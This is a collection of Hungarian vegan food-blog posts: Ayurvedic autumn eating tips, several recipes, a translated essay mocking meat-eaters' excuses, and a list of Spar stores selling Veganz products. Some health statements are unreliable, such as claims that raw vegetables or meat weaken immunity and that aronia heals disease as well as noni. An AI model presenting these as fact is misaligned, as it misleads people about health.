Úgy tűnik vége a vénasszonyok nyarának, a meleg időszaknak. Ősz van, hideg van kint, erősen fúj a szél, gyakran esik az eső. A hideg beköszöntével, ősszel a Vata minősége felerősödik. Ilyenkor sokan tapasztalják, hogy megnő az étvágyuk. Az emberek szervezete jobban kívánja a tartalmasabb, nehezebb és nagyobb adag ételeket. A szervezeted elkezd felerősíteni, tartalékolni a téli időszakra. Nagyon fontos, hogy egészséges, tápláló, az immunrendszeredet erősítő ételeket fogyassz ebben az időszakban, amik elégedettséggel, boldogsággal töltik el a tested és a lelked:). Ősszel részesítsd előnyben a friss alapanyagokból, idénynek megfelelő zöldségekből, gyümölcsökből készült főtt vagy párolt ételeket. Helyezd a lista elejére a zöldségekből és/vagy hüvelyesekből készült fűszeres leveseket, amik átmelegítik a tested, segítenek táplálni a szervezeted, rendben tartják a folyadékháztartásod és nagyon sok tápanyagot tartalmaznak. Elsődlegesen a Vata kiegyenlítését célzó édes, savanyú és sós ételeket fogyassz. Az ételeid legyenek melegek, szaftosak, lédúsak. Kerüld el a száraz és hideg ételeket, a puffasztott ételeket, nyers salátákat, pirítóst és a diétás ételeket. Próbáld kerülni, visszaszorítani a keserű, csípős, és fanyar ízek fogyasztását is. Nagyon kedvező az alábbi ételek fogyasztása: baszmati rizs, mung dhál, búzadara, cékla, sárgarépa, sütőtök,édesburgonya, mángold, kisebb mennyiségben zeller, spenót tej, joghurt, tejszín, olajos magok,datolya, füge - a magokat és az asztalt gyümölcsöket áztasd be fogyasztás előtt, mert akkor könnyebben emészthetőek. Néhány általános praktikus táplálkozási tanács, mely hozzájárul, hogy a a hideg időszakban is egészséges, energia dús maradj. Étkezz megfelelő időben és lehetőleg mindig ugyanazon időpontokban. A főétkezés 12:00-13:00 és ez legyen a nap legtartalmasabb étkezése, mert az emésztés tüze (az agni) ilyenkor a legerősebb. Reform almás szamósza - receptet itt olvashatod Kerüld az a nassolást, ne egyél az étkezések között. Fogyassz friss, tiszta minőségű élelmiszereket. Kerüld el a vegyszeres (nem bio) tartósítószerezett, feldolgozott, génmanipulált, félkész élelmiszereket. Könnyen emészthető ételeket készíts - vegyszermentes (bio) zöldségek, gyümölcsök, tejtermékek, gabonák(teljes kiőrlésű), hüvelyesek. Használj immunrendszert erősítő és emésztést segítő fűszereket (gyömbér, kurkuma, fekete bors, fahéj, édeskömény, római kömény, koriander). Készítsd ghível (tisztított vajjal) az ételeket (ghí elkészítését itt olvashatod), ez segít erősíteni az emésztésed és táplálja a testet. Ne fogyassz hideg ételeket és hideg italokat, mert a hideg ételek, gyengítik az emésztésed. Brokkolis tészta pirított napraforgómaggal - recept ittKis mennyiségben egyél olyan friss, szezonális gyümölcsöket, melyek erősítik az immunrendszered, kiváló választás a körte, alma, szilva Az ételeket főzd meg, de ne főzd túl, mert mindkét esetben gyengítik az immunrendszert. Kerüld el a húsos ételeket, a zsíros és a cukros ételeket, mert gyengítik az immunrendszert. Ne edd magad tele (max 3/4 részig töltsd meg a gyomrod). Fűszeres sütőtök subji - recept ittNe fogyassz túl sok nyers zöldséget, gyümölcsöt, mert a hideg időjárásban gyengíthetik az immunrendszered és hűtik a tested. Az ételeket rágd meg alaposan. Ne igyál az étkezésekhez túl sok folyadékot, és az elfogyasztott folyadék mindig langyos vagy meleg legyen. Nyugodt körülmények között egyél és az étkezés után ne pattanj fel az asztaltól, várd meg amíg az emésztésed beindul. Kortyolj a nap során meleg vizet, ez nagyon sokat tud segíteni (részletesen az ájurvédikus méregtelenítésről szóló cikkben) A tanácsokat lépésről, lépésre építsd be az életedbe. Kezd el a legegyszerűbbektől és saját tempódban próbáld szokásoddá alakítani. Végül figyeld magad! Figyeld milyen változásokat tapasztalsz, hogyan változik az emésztésed, az energiaszinted, a kedélyállapotod és az elméd békéje. Tápláló, ízletes ételeket kívánok szeretettel: KAti
paradicsomos hagymás hajdinafelfújt
2017. október 20. Beautilicious
Egyszerűen oda meg vissza vagyok a felfújtakért. Akár édesen, akár sósan. Variálhatod kedved szerint a gabonákat, akár kölessel, bulgurral, árpával is elkészítheted. Ez mindenhogy isteni finom. Hozzávalók - 200gr hajdina - 500ml víz - 3tojás - 1 fej vöröshagyma - 2 db paradicsom - só - 20gr ketchup Így készítsd - Főzd meg a hajdinát 500ml sós vízben - Válasszuk ketté a tojásokat - A hagymát vágd apróra, majd pirítsd meg - Adjuk hozzá a sárgájához, majd tegyük hozzá a ketchupot és keverjük el alaposan - Ha megfőtt a hajdina, adjuk hozzá ehhez a keverékhez - Vágjunk bele paradicsomot, és keverjük össze - Verjük a fehérjét kemény habbá, majd forgassuk össze a hajdinás keverékkel - Tedd a masszát sütőpapírral bélelt tepsibe - Süssük 180fokon 20 percig
Leonardo Dicaprio beszáll egy vegán burgercégbe
Így harcol a globális felmelegedés ellen.
Az emberek gyűlölik a vegánokat. Freud segíthet megérteni, miért – 3. rész
Az első két részben a reakcióképzésről és az izolációról volt szó, a harmadik lehetséges oka annak, hogy az emberek nem szívelik a vegánokat (és vegetáriánusokat), az a racionalizáció. Hogy ez mit jelent? Olvass tovább! Fordítás a következő cikkről: http://veganchowhound.com/rants/people-hate-vegans-freud-could-explain-why/ Fordította: Kertész Tibor 3. Racionalizáció Kerültél már valaha szembe egy érzékeny húsevővel, aki összevissza beszélt az ősemberekről és táplálkozási szokásaikról? Naná, hogy kerültél. Na és az, hogy ,,Jó íze van. Természetesen ezt is hallottad. ,,Mindenki ezt csinálja. Mindenki eszik húst. Na és a biblia és isten, aki a föld állatait az embernek adta? Na, számoljuk bele ezt is. Emlékeztettek-e valaha arra a tényre, hogy az embernek szemfoga van és előre néznek a szemei? Ismerős neked valami lehetetlen helyzet egy lakatlan szigeten? Racionalizálás: hogy elkerüljék a kegyetlen igazságot, az emberek mindenféle értelmetlen hülyeséggel próbálják igazolni a viselkedésüket. Az emberek bármilyen hülyeséget képesek kitalálni, hogy véletlenül se kelljen áldozatot hozniuk, vagy változtatniuk a viselkedésükön. Amikor kritikus gondolkodással, logikával vagy szilárd érvekkel találkoznak, a hozzáállásuk gyorsan negatívvá válhat. Ezek az emberek azért gyűlölik a vegánokat, mert azok megmutatják az igazságot. De most komolyan, ha egy lakatlan szigeten lennél, egyetlen sony walkmannal, akkor megennél-e egy Kelet-polinéz homoki nyulat? A vegánok nap mint nap hallják ezeket a nevetséges logikai bukfenceket és ostoba kifogásokat. Ez nem vicc, sokak számára ez a normális. Nézzük hát meg őket egy kicsit alaposabban. Először is, hogy a pokolba lesz a legkülönfélébb emberekből egyszeriben ősember szakértő? Van valami online tanfolyam, amelyet elvégeznek és így megalapozott tudással nyilatkoznak az ősember szokásairól? És miért lenne bármi köze az ősember táplálkozási szokásainak a mai modern emberéhez? Ez a gondolkodásmód, a ,,nemes vadember elmélethez hasonlít. Ez a ,,természethez fordulás téveszméje. Az az elgondolás, hogy ha húst enni természetes és akkor már egyszeriben rendben is van, képtelenség. Mert egyébként az ősemberek nem rendelkeznek WC-vel, pamutzoknival, légkondicionálóval, védőoltással, iPhone-nal, egészségbiztosítással és szabadságjogokkal, nem? Attól még, hogy valami oké volt a múltban, például agyonütni valakit egy nagy kővel, nem feltétlenül természetes és jó. Ugyanilyen irreleváns hülyeség az is, hogy az emberek szoktak vadászni, és hogy szemfogaink vannak és a szemeink előre néznek. “Kellene mondani valamit a táplálkozási láncról, az majd meggyőzni az egómat, hogy én nem vagyok rossz!” Tudnak-e az emberek egészségesen táplálkozni vegán módon? Igen. Oké, akkor mindezek a nevetséges érvek csak kifogások. “Jó íze van” Oké, cseszd szét a bolygót, a te ízlelőbimbóidnál nincs fontosabb a Földön. Láthatod, hogy a tudatalatti milyen nagy erőfeszítést tesz ezért az érvelésért. Ez épp csak egy kicsivel több annál, hogy “a hús lenni nagyon jó. A biblia felemlegetése egyszerűen bizarr, de az egy másik történet. Az emberek kétezer éve használják a bibliát szinte bármilyen viselkedés igazolására, ezen már meg sem kellene lepődnünk. Az is remek, amikor emberek azon sopánkodnak, hogy mennyire egészségtelen a vegán étrend. Légyszi, mesélj még! Egészen biztosan alapos kutatást végeztél a témában és nem csak a kisujjadból szoptad az egészet. Az emberek gyakran gyűlölik a vegánokat, mert a vegánok legalább egy kicsit utánajárnak a dolgoknak. Akik meg nem értenek hozzá, először csak néznek bután, azután dühösek lesznek. Amikor az egónak kisebbségi érzése támad valakivel szemben, akkor meg fogja próbálni ezt a személyt képmutatónak beállítani. “Ó, hát te használsz antibakteriális kézfertőtlenítőt? Ha ha ha. Látod, most megfogtalak te hülye! Istenem, hogy utálom a vegánokat!” Egyszer hallottam, hogy Joe Rogan megemlíti, hogy ő azért nem vegán, mert a kisebb állatokat megölhetik a nagy mezőgazdasági gépek, amikor betakarítják a gyümölcsöket, zöldségeket és gabonákat. Na, ez aztán a produktív logika! Jobb, ha nem is törölsz segget, nehogy véletlenül szaros legyen a kezed. “Egy farmon nőttem fel, és megszoktam az állatok leölését” Ó, egyáltalán nem vagy elfogult. Ez a gondolkodásmód csak egy újabb téveszme az ideális természetről. Csak azért, mert történt valami körülötted amíg felnőttél és egész életedben azt csináltad, attól az még nem lesz helyes. Sok farmer volt rasszista és homofób, sőt sokuk még most is az, de ettől ez még nem válik helyessé. A racionalizáció egy formája, amely sok embert vezet ahhoz, hogy gyűlölje a vegánokat, a ,,mágikus gondolkodás. Az emberek azt gondolják, hogy pusztán attól, hogy hisznek valamiben, ettől az a dolog varázslatos módon igazzá is válik. Milyen csodálatosan kényelmes dolog! Wow, az emberek hiedelmei összefüggenek önző vágyaikkal? Hogy mik vannak! 1. rész | 2. rész | 3. rész | 4. rész | 5. rész | 6. rész The post Az emberek gyűlölik a vegánokat. Freud segíthet megérteni, miért – 3. rész appeared first on VegaNinja.
Avokádókrémmel töltött kosárkák
2017. október 11. Éltető ételek
Az idei Országos Könyvtári Napok szlogenje "Csak tiszta forrásból" volt. Ennek keretében a tiszaújvárosi könyvtár sütiversenyt hirdetett, amely során csak természetes alapanyagokat lehetett felhasználni. Sok süti érkezett, de nyers desszertet csak én készítettem. A zsűri I. helyezéssel jutalmazta az édességemet, aminek nagyon örültem. :) Így hát jöjjön a recept, hogy ti is el tudjátok készíteni ezt a finomságot. Mivel igazán laktató, így 1-2 kosárka bőven elég egy délutáni nasira. Hozzávalók: (35 db kosárka) Tészta: - 25 dkg dió - 5 dkg kesudió - 25 dkg datolya - 5 dkg aszalt szilva - 1/2 mokkáskanál vaníliapor - 1/3 mokkáskanál ceyloni fahéj - 1/2 banán Csokikrém: - 2 érett avokádó - 2 érett banán - 2 evőkanál cukrozatlan kakaópor - 3-4 evőkanál kókuszvirágcukor - 1 mokkáskanál vaníliapor - 1 mokkáskanál szárított narancshéj vagy 3-4 csepp narancsolaj Nyers szilvalekvár - 10 dkg aszalt szilva - 1 dl víz - 1/3 mokkáskanál ceyloni fahéj - 3 csepp citromolaj Elkészítése: A tésztához a datolyát vágd fel kis darabokra. Az összes hozzávalóval együtt késes darálóval aprítsd morzsásra. Szilikonos mini muffinformákba nyomkodj bele 1 kis gombócnyit úgy, hogy a közepe üreges legyen. Fordítsd ki a formából, majd a kosárkát kókuszreszelékbe mártsd bele. Aszalóban (radiátoron, kandallón, napon) szárítsd ki annyira, hogy megtartsa formáját. Én kb. 4 órát aszalóban szárítottam 45-50 fokon. A krémhez mindent botmixerezz össze. A lekvárhoz a szilvát vágd fel kis darabokra, majd öntsd rá a vizet. Hagyd állni néhány órát. A fűszerekkel botmixerezd krémesre. Összeállítása: Minden kosárkába tegyél 1/2 mokkáskanálnyi lekvárt, majd nyomózsákkal csokikrémet. Díszítheted friss gyümölccsel, pl. málna, eper, kókuszreszelékkel vagy pirított mandulával. (Én kókuszcukros manduladarabkákat szórtam a tetejére.
Berber raguleves
Ehhez a bejegyzéshez az ötlet egy eredeti berber recept adta, amivel nyár végén találkoztam. Rögtön megtetszett, és alig vártam, hogy kicsit hűvösre forduljon az idő, azon nyomban ki is próbáltam.
Meg kellett állapítanom, hogy egy igazi finom, melegítő ragulevesem van!
De vajon egy ennyire forró kontinensen mint Afrika, miért készítenek az emberek melegítő ételeket?
Hová az a sok fűszer, hová a forró leves, hová a ragu, a tartalmas zöldségek?
És akkor eszembe jutott az éjjeli sivatag metsző hidege, a pusztákban töltött éjszakák, a gyapjútakarók és a nomád élet fal nélküli sátrai.
És minden világossá vált. Bizony, nagyon elkél egy ilyen leves oda is.
Fogadjátok az eredeti recept szelídített, enyhén európaisított verzióját, melegen ajánlom! :)
Extra tipp: A fahéj először alig érződik benne, és ilyenkor az ember (magamat beleértve) hajlamos kicsit rátenni még. Te inkább ne tedd. Kíváncsiságból se, mert a következő kóstolásnál már túl sok lesz. Nem szilvásgombócot készítünk. :D
- 300 g sütőtök
- 1 krumpli
- 2 szál szálzeller
- 1 nagy sárgarépa
- 1/4 vöröshagyma
- 1/2 csicseriborsó konzerv
- 1 ek bio ételízesítő (szárított zöldség)
- 5 ek olívaolaj
- 1 evőkanál édes pirospaprika (ízlés szerint csípőssel keverhető)
- 1/2 kk örölt kömény
- 1/2 mk római kömény
- 1 késhegynyi őrölt fahéj
- só, bors
- A megtisztított zöldségeket vágjuk fel közel egyforma darabokra.
- Egy nagy fazékban olajon finoman pároljuk meg a vöröshagymát, majd dobjuk rá a sárgarépát és a zellerszeletkéket. Kis víz hozzáadásával hagyjuk 10 percig párolódni.
- Ezután jöjjenek sorjában a fűszerek, amiket hagyjunk pár percig melegedni a párolódó zöldségeken.
- Adjuk hozzá a felkockázott krumplit és sütőtököt, a leöblített csicseriborsót.
- Öntsük fel annyi vízzel, hogy kényelmesen ellepje, és nagy lángon forraljuk fel. Ezután tegyük takarékra, és főzzük fél órát. Sózzuk, borsozzuk, hagyjuk még 10 percet gyöngyözni, majd zárjuk el.
A zeller zöldjével vagy petrezselyemzölddel tálaljuk.
Jó étvágyat!
Elkészítési idő: 40 perc
Ez egy vegán recept volt. :)
Hasonló recepteket ITT találsz még.
Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :)
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat:
Kezdő Vegán
Vegán MUST HAVE – a kötelező alapcsomag
Növényi Tejek és Tejtermékek I
Növényi Tejtermékek II
A Mindennapi Superfood
Kezdő Vegán Angol nyelven
Végezetül innen letöltheted a két ajándék receptgyűjteményt is.
The post Berber raguleves appeared first on Kertkonyha.
Áfonya-fekete berkenye smoothie (laktózmentes, gluténmentes, vegán)
2017. október 2. Zizi kalandjai
Még nem meséltem nektek, de végre vidékre költöztünk a fővárosból. Na nem mentünk messzire, nagyon közel vagyunk Budapesthez, de mégis zöld övezetben, erdőkkel, dombokkal körülvéve. Van kertünk, ahol láttunk már mókust ugrálni a diófánkon, meg kétszer láttam két különböző napon, de ugyanabban az időben mezei egeret elillanni a szomszéd telekre – de bízom benne, hogy a szomszédoktól néha-néha a kertünkbe kóboroló macskák biztosítanak az egerek elriasztásától! Vannak tücskök, bogarak – nyilván sokkal többféle, mint amennyivel a 13. kerületben találkoztunk, meg vannak napon sütkérező, villámgyorsan elillanó gyíkok, tiszta, felsepert utcák, rengeteg diófa, vadgesztenyefa mindenfelé, végtelen csend, jó levegő és kedvesen ismerkedő, bőbeszédű nénik, bácsik (akiktől minden fontos információt megtudunk a nagyközségről). Gyalog távolságra van a waldorf óvoda, ami az álmunk volt, mert én és I. is úgy nőttünk fel (nagyobb vidéki városokban), hogy gyalog tudtunk menni az óvodába és az általános iskolába is. Mi is ezt szerettük volna, hogy ne kelljen zsúfolt tömegközlekedésen vagy autóban, dugóban ülve óvodába hordanunk a gyerekeinket.
Még a berendezkedés fázisában vagyunk egy belülről felújított házban, szóval új konyhánk van (amelyen még egy kicsit dolgoznunk kell, hogy legyen belőle álomkonyha blogbejegyzés, amit már többen kértetek ), meg új fürdőszoba, wc, aludni tudunk min, de a bútorok egy része, a hangulat megteremtése (amit szeretnénk elérni) még hiányzik. Lassan dolgozunk rajta, de idő lesz mire mindennel megleszünk. A lényeg, hogy imádjuk ezt a helyet, a vidéki hangulatot, a nyugit, de az is szuper, hogy Budapest közel van, így bármikor könnyen a fővárosban tudunk lenni.
De térjünk át erre a csoda sötét pink vagy lila smoothie-ra, ami a színét az áfonyától és a fekete berkenye portól kapja. De mi is az a feketeberkenye? Addig én sem tudtam, amíg ezzel a por formájú változattal nem találkoztam, így gondoltam, hogy utána nézek.
Csodás színű fekete berkenye por
A fekete berkenyének igen magas a gyümölcscukor-, pektin-és csersavtartalma. Ez utóbbi miatt, ha lét készítenek belőle – a teljesebb lényerés érdekében-, először fagyasztják, majd édesítik, valamint a kellemes ízhatás érdekében citromsavat is adnak hozzá. Kapható olyan készítmény, amely a fekete berkenyét természetes őrlemény formájában, esetleg más gyümölcsökkel együtt tartalmazza. Por formában többek között a Veganz német cég állítja elő Európában, amelyet itthon a Spar üzleteiben lehet most már megvenni.
“A bogyókat egyébként sokféle módon használják fel, nem csak a kb. 80%-os létartalmát, hanem a főként a héjában lévő növényi színezőanyagot is élelmiszerek színezésére. Nagyon magas a C-vitamin tartalma, ezenkívül rendkívül hatékony gyulladáscsökkentő, illetve -megelőző hatása. Gyógyító értéke magas P-vitamin-(flavonoid), vízben oldódó B1-, B2-,B6-, B9-, B12-, C- és H-vitamin tartalmának, zsírban oldódó A-, E-és K-vitamin tartalmának és összességében kiemelkedően magas, a sejteket a pusztulástól védő szabadgyök-fogó kapacitásának köszönheti. A kutatók egyöntetű véleménye szerint összességében legalább olyan betegség-megelőző és gyógyító erővel rendelkezik, mint a tahiti csodanövény, a noni gyümölcse.” (Forrás: innen).
Ehhez a smoothie-hoz a fekete berkenyét egy másik bogyós gyümölccsel, az áfonyával párosítottam. Csodálatos lett a színe és az íze is. A fekete berkenye por ugyanolyan minőséget képvisel, mint a mostanában nagyon felkapott acai por! Tehetjük kásákba, nyers süteményekbe, turmixokba.
Áfonya-fekete berkenye smoothie (laktózmentes, gluténmentes, vegán) Mentés Nyomtatás Előkészítési idő 2 perc Főzési idő 5 perc Teljes idő 7 perc Csodás lila színű, vitaminokban gazdag turmix reggelire vagy uzsonnára. Szerző: Zizi Recept típusa: turmix, reggeli, ital Konyha: vegán, gluténmentes Adag/mennyiség: 2 főre Hozzávalók 2 db érett banán, meghámozva 1 és ½ bögre fagyasztott áfonya 160-180 ml kókuszos rizstej 6 evőkanál natúr kókuszjoghurt 2 evőkanál quinoa pehely 2 evőkanál fekete berkenye por 2 evőkanál kendermag por (opcionális) hántolt kendermag/tökmag/napraforgómag/kókuszchips, tálaláshoz Elkészítés A hozzávalókat tegyük turmixgépbe, és turmixoljuk 5 percig. Először csak 160 ml rizstejet adjunk hozzá, fokozatosan hígítsuk többel, ha hígabbra szeretnénk az italunkat. Jegyzetek A quinoapehely helyett tehetünk bele zabpelyhet, de ekkor nem lesz gluténmentes az italunk (kivéve, ha gluténmentes zabpelyhet használunk). A rizstej helyett használhatunk bármilyen más gluténmentes növényi tejet (kókusz-, vagy mandulatejet), illetve lehet zabtejjel is készíteni (szintén figyelni kell a gluténmentességre, akinél ez fontos). Ha a banánt is fagyasztva rakjuk bele, akkor egy sűrű, krémes, desszert szerű reggeli kását kapunk. Tálalhatjuk granolával is. 3.5.3226
*****
A fekete berkenye port, a kókuszos rizstejet a {Spar Magyarország} biztosította a recepthez. A véleményem csakis a sajátom.
Kókusztálka a Coconut Bowls-tól.
Hol vásárolhatod meg a Spar újonnan bevezetett, vegán termékcsaládját, a Veganz termékeket?
2017. szeptember 26. VegaNinja
A magyar SPAR üzletlánc a növényi alapú, német Veganz márka nasijaival és más vegán termékeivel rukkolt elő. A több mint 60 különféle termék között olyan finomságok találhatóak, mint a bio növényi tejek, természetes édesítők, különféle magkrémek, magas fehérjetartalmú proteinporok, valamint az utánozhatatlan csokik és kekszek. Az üzletek listája, ahol megvásárolhatod őket, a kattintás után! A termékek nem olcsók, de az ember néha megjutalmazhatja magát egy-egy finomsággal, például a verhetetlen csokijaikkal és kekszeikkel, amik nekem is a kedvenceim közé tartoznak. “Egyre nagyobb az igény a növényi alapú ételek iránt, miután egyre többen választják a növényi alapú életmódot. A kezdetek óta kiemelt jelentőséget tulajdonítunk az egészséges életmód népszerűsítésének, amelyeknek legfontosabb eleme a tudatos táplálkozás. Ezért a nyugat-európai trendnek megfelelően folyamatosan bővítjük az egészséges életformát támogató termékeink választékát - mondta Maczelka Márk, a SPAR kommunikációs vezetője. A Veganz a növényi alapú élelmiszerek márkája. A 2011-es berlini alapítást követően a vállalat Európa egyik legelső vegán áruházláncaként vált ismertté. Sokszínű és életigenlő vállalati filozófiájával a fiatal cégnek sikerült megváltoztatni a vegánságra vonatkozó előítéleteket, és meghonosítani az európai piacon az új táplálkozási trendet. A Veganz folyamatosan bővülő árupalettája garantálja, hogy mindenki megtalálja a kedvére valót. A vállalat különösen nagy hangsúlyt fektet a minőségellenőrzésre, az egyenletesen jó minőségre és egyedülálló ízre. Így válik mindenki számára a vegán életmód és életérzés könnyűvé, rendkívül finommá, illetve könnyedén megvalósíthatóvá. A SPAR a Veganz növényi eredetű termékeit kínálva egyszerűbbé teszi a vegán táplálkozást. A több mint 60 különféle termék között olyan finomságok találhatóak a SPAR dedikált üzleteiben, mint az organikus növényi tejek, természetes édesítők, magas ásványi anyag tartalmú magkrémek, magas fehérjetartalmú proteinporok, valamint változatos édes és sós nassolnivalók. A termékcsalád tagjai 2017. szeptember 21-től elérhetőek minden INTERSPAR hipermarketben és 90 kijelölt SPAR és City SPAR szupermarketben. 1032 Budapest Bécsi út 154. INTERSPAR hipermarket 1103 Budapest Sibrik Miklós út 30. INTERSPAR hipermarket 1106 Budapest Kerepesi út 61. INTERSPAR hipermarket 1117 Budapest Október huszonharmadika utca. 8-10. INTERSPAR hipermarket 1191 Budapest Üllői út 201. INTERSPAR hipermarket 1201 Budapest Széchenyi utca 1. INTERSPAR hipermarket 2000 Szentendre Dobogókői út 4. INTERSPAR hipermarket 2030 Érd Iparos utca 5. INTERSPAR hipermarket 2049 Diósd Balatoni út 2/A INTERSPAR hipermarket 2400 Dunaújváros Béke körút 2. INTERSPAR hipermarket 2800 Tatabánya Győri út 25. INTERSPAR hipermarket 3524 Miskolc Bajcsy-Zsilinszky út 2-4. INTERSPAR hipermarket 3600 Ózd Sárli út 4. INTERSPAR hipermarket 4032 Debrecen Füredi út 27. INTERSPAR hipermarket 4400 Nyíregyháza László utca 8. INTERSPAR hipermarket 4400 Nyíregyháza Korányi Frigyes utca INTERSPAR hipermarket 5000 Szolnok Mátyás Király út 29. INTERSPAR hipermarket 5700 Gyula Kétegyházi út 1. INTERSPAR hipermarket 6800 Hódmezővásárhely Kaszap utca 20. INTERSPAR hipermarket 7100 Szekszárd Tartsay utca 9. INTERSPAR hipermarket 7632 Pécs Siklósi út 37. INTERSPAR hipermarket 7632 Pécs Bajcsy-Zsilinszky út 11. INTERSPAR hipermarket 8000 Székesfehérvár Budai út 41. INTERSPAR hipermarket 8000 Székesfehérvár Balatoni út 44-46. INTERSPAR hipermarket 8200 Veszprém Dornyai Béla utca 4. INTERSPAR hipermarket 8360 Keszthely Tapolcai út 37. INTERSPAR hipermarket 8500 Pápa Celli út 21. INTERSPAR hipermarket 8800 Nagykanizsa Táborhely utca 4. INTERSPAR hipermarket 8900 Zalaegerszeg Ola utca 1. INTERSPAR hipermarket 9023 Győr Fehérvári út 3. INTERSPAR hipermarket 9027 Győr ECE Budai út 1. INTERSPAR hipermarket 9400 Sopron Selmeci utca 15-17. INTERSPAR hipermarket 9700 Szombathely Újvilág utca INTERSPAR hipermarket BUDAPEST: 1011 Budapest Batthyány tér 5-6. SPAR szupermarket 1021 Budapest Hűvösvölgyi út 138. SPAR szupermarket 1024 Budapest Lövőház utca 2-6. SPAR szupermarket 1025 Budapest Rózsadomb Center, Törökvész út 87-91. SPAR szupermarket 1026 Budapest Gábor Áron utca 74-78. SPAR szupermarket 1031 Budapest Monostori út 3. SPAR szupermarket 1032 Budapest Bécsi út 136. SPAR szupermarket 1046 Budapest Görgey Artúr út 22. SPAR szupermarket 1048 Budapest Megyeri út 236. SPAR szupermarket 1062 Budapest Váci út 1-3. SPAR szupermarket 1066 Budapest Teréz körút 28. SPAR szupermarket 1066 Budapest Nyugati tér 1-2. SPAR szupermarket 1071 Budapest Dembinszky utca 12. SPAR szupermarket 1072 Budapest Klauzál tér 11. SPAR szupermarket 1073 Budapest Erzsébet körút 24. City SPAR szupermarket 1085 Budapest Blaha Lujza tér 1-2. SPAR szupermarket 1095 Budapest Mester u. 30-32. SPAR szupermarket 1106 Budapest Kerepesi út 73. SPAR szupermarket 1112 Budapest Péterhegyi lejtő 36. SPAR szupermarket 1118 Budapest Rétköz utca 7. SPAR szupermarket 1123 Budapest MOM Park, Alkotás utca 53. SPAR szupermarket 1146 Budapest Egressy út 178/C SPAR szupermarket 1148 Budapest Örs Vezér tere 24. SPAR szupermarket 1165 Budapest Arany János utca 102. SPAR szupermarket 1172 Budapest Jászapáti utca 71-75. SPAR szupermarket 1173 Budapest Pesti út 169. SPAR szupermarket 1173 Budapest Maroshévíz utca 1. SPAR szupermarket 1182 Budapest Alacskai út 3. SPAR szupermarket 1182 Budapest Cziffra György utca 15/b. SPAR szupermarket 1212 Budapest Görgey Artúr tér 20. SPAR szupermarket VIDÉK: 2000 Szentendre Ady Endre utca 24. SPAR szupermarket 2000 Szentendre Dunakanyar körút 2. SPAR szupermarket 2013 Pomáz Huszár utca 25. SPAR szupermarket 2030 Érd Diósdi út 46. SPAR szupermarket 2083 Solymár Terstyánszky Ödön utca 102. SPAR szupermarket 2092 Budakeszi Márity László út 20. SPAR szupermarket 2100 Gödöllő Köztársaság út 85. SPAR szupermarket 2112 Veresegyház Gödöllői út 2/a. SPAR szupermarket 2120 Dunakeszi Barátság útja 13. SPAR szupermarket 2120 Dunakeszi Toldi Miklós utca 1. SPAR szupermarket 2131 Göd Pesti út 176. SPAR szupermarket 2230 Gyömrő Kossuth út 41/a. SPAR szupermarket 2234 Maglód Damjanich utca 29. SPAR szupermarket 2364 Ócsa Szabadság tér 1. SPAR szupermarket 2481 Velence Tópart utca 47. SPAR szupermarket 2483 Gárdony Szabadság út 2392/I. SPAR szupermarket 2483 Gárdony Balatoni út 70/10. hrsz. SPAR szupermarket 2510 Dorog Bányász körönd 1737/16. hrsz. SPAR szupermarket 2536 Nyergesújfalu Kossuth Lajos utca 1439/6. hrsz. SPAR szupermarket 2600 Vác Avar utca 6. SPAR szupermarket 2800 Tatabánya Szent Borbála út 33/1. SPAR szupermarket 2870 Kisbér Kossuth Lajos utca 4/6. SPAR szupermarket 2890 Tata Ady Endre utca 20. SPAR szupermarket 2900 Komárom Klapka György út 69. SPAR szupermarket 3060 Pásztó Fő utca 83-87. SPAR szupermarket 3200 Gyöngyös Dobó István utca 5. SPAR szupermarket 3300 Eger Sas utca 1. SPAR szupermarket 3360 Heves Fő út 48. SPAR szupermarket 3390 Füzesabony Hunyadi út 2869/27. hrsz. SPAR szupermarket 3860 Encs Petőfi út 66. SPAR szupermarket 4024 Debrecen Fórum Csapó utca 30. SPAR szupermarket 4225 Debrecen-Józsa Szentgyörfalvi út 26420/1. hrsz. SPAR szupermarket 6000 Kecskemét Március 15-e utca 5/a. SPAR szupermarket 6050 Lajosmizse Dózsa György út 20-22. SPAR szupermarket 6060 Tiszakécske Vízhányó János utca 2/a. SPAR szupermarket 6100 Kiskunfélegyháza Béke tér 3-4. SPAR szupermarket 6724 Szeged Londoni körút 3. SPAR szupermarket 7400 Kaposvár Honvéd utca 57. SPAR szupermarket 7400 Kaposvár Berzsenyi utca 1-3. SPAR szupermarket 7761 Kozármisleny Vadvirág utca 1. SPAR szupermarket 8000 Székesfehérvár Pozsonyi út 10. SPAR szupermarket 8000 Székesfehérvár Rákóczi utca 3-5. SPAR szupermarket 8200 Veszprém Cserhát lakótelep 6. SPAR szupermarket 8230 Balatonfüred Arácsi út 15. SPAR szupermarket 8330 Sümeg 84-es főút 1623/10 hrsz. SPAR szupermarket 8440 Herend Vasút utca 1/c. SPAR szupermarket 8622 Szántód Siófoki út 3. SPAR szupermarket 8868 Letenye Kossuth Lajos utca 2. SPAR szupermarket 8960 Lenti Kisfaludy utca 4. SPAR szupermarket 9021 Győr Arany János utca 16. SPAR szupermarket 9200 Mosonmagyaróvár Régi Vámház tér 5. SPAR szupermarket 9200 Mosonmagyaróvár Aranyossziget utca 1. SPAR szupermarket 9330 Kapuvár Fő tér 2/2. SPAR szupermarket 9330 Kapuvár Győri út 1480. hrsz. SPAR szupermarket 9400 Sopron Arany János utca 16. SPAR szupermarket 9443 Petőháza Spar út 1. SPAR szupermarket 9500 Celldömölk Sági utca 22. SPAR szupermarket 9600 Sárvár Laktanya utca 32-44. SPAR szupermarket 9800 Vasvár Alkotmány utca 95. SPAR szupermarket 9900 Körmend Rákóczi út 2/C. SPAR szupermarket The post Hol vásárolhatod meg a Spar újonnan bevezetett, vegán termékcsaládját, a Veganz termékeket? appeared first on VegaNinja.
Krémes zöld banánfagylalt (laktózmentes, gluténmentes, cukormentes, vegán)
2017. szeptember 22. Zizi kalandjai
Igen, tudom, már javában ősz van és most naptár szerűen szeptember 2-án már beköszöntött a hűvösebb, esős idő. Én azonban várom még a vénasszonyok nyarát, mert a kertünkben bőven akad tennivaló és az ilyen munkákat jobban szeretem száraz időben csinálni.
